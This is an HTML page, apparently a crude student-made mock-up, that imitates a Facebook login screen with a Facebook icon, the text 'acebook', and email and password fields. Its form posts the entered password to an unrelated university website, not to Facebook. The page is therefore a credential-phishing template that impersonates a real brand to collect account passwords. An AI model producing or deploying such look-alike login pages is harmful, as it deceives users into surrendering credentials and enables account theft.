<html>
<head>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body
{
background:#483D8B;
margin-top:120px;
}
input[type=text],select 
    {
  width: 30%;
  padding: 15px 2px;
  margin: 8px 10px;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}
input[type=password], select {
  width: 30%;
  padding: 15px 2px;
  margin: 8px 10px;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}
button {
   margin-left: 00px;
  background-color: #483D8B;
  color: white;
  padding: 15px 25px;
  text-align: center;
  font-size: 16px;
  cursor: pointer;
}
</style>
    
</head>
<body>
<script language="javascript">
function checkEmail() {

    var email = document.getElementById('txtEmail');
     var password1 = document.getElementById('pass');
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

    if (!filter.test(email.value)) 
    {
    alert('Please provide a valid email address');
    email.focus;
    return false;
    }
   
    
}
   


</script>
<center>
<font color="white"><i class="fa fa-facebook-square" style="font-size:60px"></i><font size="10">acebook<br>

   <form action="https://www.chitkarauniversity.edu.in/" method="post" name="form">
<input type='text' placeholder="Enter your Email Id" id='txtEmail' required>
<br><input type="Password" placeholder="Password" name="password" id="pass" required><br>
       
       <button  onclick='Javascript:checkEmail();'/>Log In</button><br></font></font>
    </center>
</body>
</html>